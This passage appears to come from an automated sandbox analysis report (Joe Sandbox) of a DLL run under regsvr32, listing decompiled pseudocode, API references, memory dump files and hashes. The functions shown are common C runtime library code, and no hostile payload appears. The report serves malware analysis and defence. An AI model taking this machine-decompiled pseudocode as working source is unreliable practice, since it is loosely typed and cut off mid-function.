0x00000000
0x6f850b47
0x6f850b4e
0x6f850b53
0x6f850b56
0x6f850b59
0x00000000
0x6f850b5f
0x6f850b5f
0x00000000
0x6f850b5f
0x6f850b59
0x6f850b41
0x6f850b06
0x6f850b0a
0x6f850b0d
0x6f850b12
0x6f850b18
0x6f850b1a
0x6f850b21
0x6f850b67
0x6f850b6a
0x6f850b6b
0x6f850b70
0x6f850b73
0x6f850b76
0x00000000
0x00000000
0x00000000
0x00000000
0x6f850b76
0x00000000
0x6f850b04
0x6f85099f
0x6f850ca7
0x6f850ca7
0x6f850ca9
0x6f850cac
0x6f850cac
0x6f850cac
0x6f850cac
0x6f850cbe
0x6f850cc0
0x6f850cc1
0x6f850cc2
0x6f850ccc

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6F850969
__fassign.LIBCMT ref: 6F850B4E
__fassign.LIBCMT ref: 6F850B6B
WriteFile.KERNEL32(?,6F84E286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F850BB3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F850BF3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6F850C9B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: accfa1359c8374e6a64b4ef4dc2498e4354c599e143fd0e9460c82f0d83128ad
Instruction ID: 5968796ddf4a59da3e85449c7781f3835bff1f8da3e8b404c5e6010bd198ce33
Opcode Fuzzy Hash: accfa1359c8374e6a64b4ef4dc2498e4354c599e143fd0e9460c82f0d83128ad
Instruction Fuzzy Hash: 9CC1E0B5D042999FCF04CFE8C9809EDBBB5AF49318F2845AAE855BB241D330AD16CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F84AD94 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6F84AD94(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6f85c030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6F84BF60(_t13, __eflags,  *0x6f85c030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6F84BF9B(_t14, __eflags,  *0x6f85c030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6F84D58B();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6F84BF9B(_t18, __eflags,  *0x6f85c030, 0);
								} else {
									_t8 = E6F84BF9B(_t18, __eflags,  *0x6f85c030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6F84C2B0(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6f84ad94
0x6f84ad9b
0x6f84adae
0x6f84adb5
0x6f84adb7
0x6f84adb8
0x6f84adbb
0x6f84add4
0x6f84add4
0x6f84adbd
0x6f84adbd
0x6f84adbf
0x6f84adc9
0x6f84add0
0x6f84add2
0x6f84add9
0x6f84ade2
0x6f84ade5
0x6f84ade6
0x6f84ade8
0x6f84adfc
0x6f84adfc
0x6f84ae05
0x6f84adea
0x6f84adf1
0x6f84adf7
0x6f84adf8
0x6f84adfa
0x6f84ae0e
0x6f84ae10
0x6f84ae10
0x00000000
0x00000000
0x00000000
0x6f84adfa
0x6f84ae13
0x00000000
0x00000000
0x00000000
0x6f84add2
0x6f84adbf
0x6f84ae1b
0x6f84ae25
0x6f84ad9d
0x6f84ad9f
0x6f84ad9f

APIs

GetLastError.KERNEL32(00000001,?,6F84A952,6F848F01,6F8492CE,?,6F849506,?,00000001,?,?,00000001,?,6F85A618,0000000C,6F8495FF), ref: 6F84ADA2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F84ADB0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F84ADC9
SetLastError.KERNEL32(00000000,6F849506,?,00000001,?,?,00000001,?,6F85A618,0000000C,6F8495FF,?,00000001,?), ref: 6F84AE1B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 79f60788ba3a6125a8b9912c10f292232a02acc0249d914617a68b882568e604
Instruction ID: 14c8c491e2f57ee41490c4cf600aae4c2d728e837971ed3d47fd6f4b447f768f
Opcode Fuzzy Hash: 79f60788ba3a6125a8b9912c10f292232a02acc0249d914617a68b882568e604
Instruction Fuzzy Hash: 8E01D83211DB296FAF441E795C8465B2B64EF03E7D72007FAF5244D0D2EF155835D980

Uniqueness

Uniqueness Score: -1.00%

Function 6F84F217 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F84F217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6F84FCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6F84FCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6F84D437(GetLastError());
									_t17 =  *((intOrPtr*)(E6F84D46D(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6F84F2DE(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6F84D437(GetLastError());
						_t17 =  *((intOrPtr*)(E6F84D46D(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6F84F2DE(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6F84F305(_a8);
				return 0;
			}

0x6f84f21d
0x6f84f222
0x6f84f236
0x6f84f239
0x6f84f26b
0x6f84f273
0x6f84f275
0x6f84f28e
0x6f84f291
0x6f84f294
0x6f84f2a2
0x6f84f2b1
0x6f84f2b9
0x6f84f2bb
0x6f84f2d4
0x6f84f2d7
0x6f84f2d7
0x6f84f2bd
0x6f84f2c4
0x6f84f2cf
0x6f84f2cf
0x6f84f2d9
0x6f84f2da
0x00000000
0x6f84f2da
0x6f84f299
0x6f84f29e
0x6f84f2a0
0x00000000
0x00000000
0x00000000
0x6f84f2a0
0x6f84f27e
0x6f84f289
0x00000000
0x6f84f289
0x6f84f23b
0x6f84f23e
0x6f84f241
0x6f84f254
0x6f84f257
0x6f84f259
0x6f84f25b
0x00000000
0x6f84f25b
0x6f84f247
0x6f84f24c
0x6f84f24e
0x00000000
0x00000000
0x00000000
0x6f84f24e
0x6f84f227
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F84F21C

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 193593485d6370584b2ae5619789833b91b11954ead292f57f5f744488d23ec6
Instruction ID: 1a4cd724f3bee64608d27d6c87b9b6dd00ba35f1bfb753200d312e1ea3db317c
Opcode Fuzzy Hash: 193593485d6370584b2ae5619789833b91b11954ead292f57f5f744488d23ec6
Instruction Fuzzy Hash: 0D218E7660472DBFA7049FB99C8095BB7ADEF653687008E99F8259F180E760FC5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84BE07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F84BE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6f85d3ec + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6f855e38 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6F84D618(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6f84be0e
0x6f84be82
0x6f84be13
0x6f84be15
0x6f84be1c
0x6f84be20
0x6f84be29
0x6f84be38
0x6f84be41
0x6f84be45
0x6f84be8e
0x6f84be90
0x6f84be94
0x6f84be97
0x6f84be97
0x6f84be9d
0x6f84be9d
0x6f84be89
0x6f84be8d
0x6f84be8d
0x6f84be47
0x6f84be50
0x6f84be7a
0x6f84be7d
0x6f84be7f
0x6f84be7f
0x00000000
0x6f84be7f
0x6f84be52
0x6f84be5d
0x6f84be62
0x6f84be67
0x00000000
0x00000000
0x6f84be6e
0x6f84be74
0x6f84be78
0x00000000
0x00000000
0x00000000
0x6f84be78
0x6f84be25
0x00000000
0x00000000
0x00000000
0x6f84be27
0x6f84be87
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6F84BEC8,00000000,?,00000001,00000000,?,6F84BF3F,00000001,FlsFree,6F855EF4,FlsFree,00000000), ref: 6F84BE97

Strings

api-ms-, xrefs: 6F84BE57

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: ecc4a51b27db681c7b65f13054fa22e548965fde4218b2053201273dc503b32c
Instruction ID: 7c32fd895c7fa90d7d1372a9862645b35a821d26e11864d70ab227bfdcfa53a6
Opcode Fuzzy Hash: ecc4a51b27db681c7b65f13054fa22e548965fde4218b2053201273dc503b32c
Instruction Fuzzy Hash: 3911C232A45B28ABDF524ABC8C40B4E37A4BF42774F110AE1FA14EF280D764F910C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84C8EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6F84C8EA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f8551b8(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f84c8f0
0x6f84c8f4
0x6f84c8ff
0x6f84c907
0x6f84c912
0x6f84c918
0x6f84c91c
0x6f84c923
0x6f84c929
0x6f84c929
0x6f84c92b
0x6f84c930
0x00000000
0x6f84c935
0x6f84c93c

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F84C89C,?,?,6F84C864,?,00000001,?), ref: 6F84C8FF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F84C912
FreeLibrary.KERNEL32(00000000,?,?,6F84C89C,?,?,6F84C864,?,00000001,?), ref: 6F84C935

Strings

CorExitProcess, xrefs: 6F84C90A
mscoree.dll, xrefs: 6F84C8F8

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7636f0217455becdca6a1290aa8544cc681f50189e0777da3465a9db73624f4b
Instruction ID: 23e36a10294801bcf4af8da7c5b66d9f9800821a30e4febb7453f19e52c62c48
Opcode Fuzzy Hash: 7636f0217455becdca6a1290aa8544cc681f50189e0777da3465a9db73624f4b
Instruction Fuzzy Hash: B2F08C30501618FBDF81AB65C809BDEBFA8EB06769F0004E1F801E9150CB348A24DA90

Uniqueness

Uniqueness Score: -1.00%

Function 6F85190B Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F85190B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f85c708; // 0x6f85c758
					if(_t23 != 0) {
						E6F84DC0E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f85c70c; // 0x6f85d9f4
					if(_t24 != 0) {
						E6F84DC0E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f85c710; // 0x6f85d9f4
					if(_t25 != 0) {
						E6F84DC0E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f85c738; // 0x6f85c75c
					if(_t26 != 0) {
						E6F84DC0E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f85c73c; // 0x6f85d9f8
					if(_t27 != 0) {
						return E6F84DC0E(_t6);
					}
				}
				return _t6;
			}

0x6f851911
0x6f851916
0x6f85191a
0x6f851920
0x6f851923
0x6f851928
0x6f85192c
0x6f851932
0x6f851935
0x6f85193a
0x6f85193e
0x6f851944
0x6f851947
0x6f85194c
0x6f851950
0x6f851956
0x6f851959
0x6f85195e
0x6f85195f
0x6f851962
0x6f851968
0x00000000
0x6f851970
0x6f851968
0x6f851973

APIs

_free.LIBCMT ref: 6F851923

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

_free.LIBCMT ref: 6F851935
_free.LIBCMT ref: 6F851947
_free.LIBCMT ref: 6F851959
_free.LIBCMT ref: 6F85196B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1cc14411765cfb5c7fe440c6973fe44698c3cba6b5b1deeb9f6b82555fdfc5b7
Instruction ID: 912e0a2f2aa3c25840c1a089e457704da1883ea2557ab7a140e8116a0fcb685c
Opcode Fuzzy Hash: 1cc14411765cfb5c7fe440c6973fe44698c3cba6b5b1deeb9f6b82555fdfc5b7
Instruction Fuzzy Hash: 4FF04F32504B08A78B84CEACD2C4C5673DEEA027247A00C86E015DFA40C774F8A18A90

Uniqueness

Uniqueness Score: -1.00%

Function 6F84EB9B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6F84EB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6F84CC22(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F852161(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6F84C27C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6F84DC48(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6F852161(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6F84F185(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F84DC0E(_t300);
														_t302 = _v12;
													}
													E6F84DC0E(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6F852161(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F84C27C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6f85c024; // 0x17ad5049
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6F8521B0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6F84EB7E(_t244 - _t287 + 1, _t287,  &_v676, E6F84F092(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6F84EAAF( &(_v608.cFileName),  &_v640,  &_v609, E6F84F092(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6F84DC0E(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
